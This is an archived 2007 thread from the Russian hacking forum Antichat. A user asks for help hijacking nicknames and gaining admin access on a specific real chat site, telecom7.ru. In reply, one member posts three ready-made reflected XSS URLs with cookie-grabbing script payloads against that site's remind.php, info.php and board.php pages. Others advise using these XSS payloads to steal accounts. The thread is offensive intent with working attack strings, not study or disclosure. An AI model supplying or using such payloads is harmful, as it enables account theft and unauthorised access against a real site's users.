ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как узнать ID ника в чате www.telecom7.ru ?
  #1  
Старый 06.03.2007, 19:29
Аватар для vnuki
vnuki
Новичок
Регистрация: 20.10.2006
Сообщений: 25
Провел на форуме:
601498

Репутация: 16
По умолчанию Как узнать ID ника в чате www.telecom7.ru ?

Здрасти...Кто нить может подсказать как можно узнать ID ника ,в чате http://www.telecom7.ru/Chat/ ...это надо для того чтоб сворвать ник,и там есть тупой админ у которого если узнать Id то можно получить полный доступ к чату ..+ язнаю все пути в админку и все такое..пожалуста помогите как узнать ID ника в чате ? http://www.telecom7.ru/Chat/

Последний раз редактировалось [sL1p]; 06.03.2007 в 19:58.. Причина: учимся давать правильные ссылки
 
Ответить с цитированием

  #2  
Старый 06.03.2007, 19:55
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Щас зайду в чат, посмотрю что там можно сделать.
__________________
..
 
Ответить с цитированием

  #3  
Старый 06.03.2007, 20:02
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Насчёт ID пока что х3 - смотрю ещё...
Если что там XSS есть ещё:
Код:
http://www.telecom7.ru/Chat/remind.php?nick="><script>alert(document.cookie)</script>
Код:
http://www.telecom7.ru/Chat/info.php?i=</title><script>alert(document.cookie)</script>
Код:
http://www.telecom7.ru/Chat/board.php?ss=\'>"><script>alert(document.cookie)</script>

Последний раз редактировалось ice1k; 06.03.2007 в 20:20..
 
Ответить с цитированием

  #4  
Старый 06.03.2007, 20:13
Аватар для vnuki
vnuki
Новичок
Регистрация: 20.10.2006
Сообщений: 25
Провел на форуме:
601498

Репутация: 16
По умолчанию

ice1k ,спасибо большое ..счас будем разбиратся
 
Ответить с цитированием

  #5  
Старый 06.03.2007, 20:32
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

В общем я не знаю с чего ты взял что там есть айди как таковой. Его там нету ни в каком месте. Форма входа без всяких айди:

Код HTML:
<td alight=right width=80>Ваш ник:</td>
<td><input class=text maxLength=25 NAME=nick value=""></TD>

<TD ALIGHT=RIGHT>Пароль:</TD>
<TD><INPUT class=text maxLength=20 type="password" NAME="psw" value=""></TD>
Так что юзай xss которые айс выложил.
__________________
..
 
Ответить с цитированием

  #6  
Старый 06.03.2007, 23:12
Аватар для vnuki
vnuki
Новичок
Регистрация: 20.10.2006
Сообщений: 25
Провел на форуме:
601498

Репутация: 16
По умолчанию

Цитата:
Сообщение от [sL1p]  
В общем я не знаю с чего ты взял что там есть айди как таковой. Его там нету ни в каком месте. Форма входа без всяких айди:

Код HTML:
<td alight=right width=80>Ваш ник:</td>
<td><input class=text maxLength=25 NAME=nick value=""></TD>

<TD ALIGHT=RIGHT>Пароль:</TD>
<TD><INPUT class=text maxLength=20 type="password" NAME="psw" value=""></TD>
Так что юзай xss которые айс выложил.
ок .спасибо... а там вобще какнить возможно красть ники? я уже почучуть разбираюсь...
 
Ответить с цитированием

  #7  
Старый 06.03.2007, 23:41
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Цитата:
а там вобще какнить возможно красть ники?
угу. юзай Xss ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите найти уязвимость в strawberry или cutenews ALL_SR Форумы 1 14.05.2009 22:03
Помогите найти уязвимость PHPMailList Version 1.8.0 AntiPhp E-Mail 10 28.10.2006 06:19
Помогите найти уязвимости в этом чате (_http://www.aworld.ru/chat/) Inkorpus Чаты 13 16.06.2006 13:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ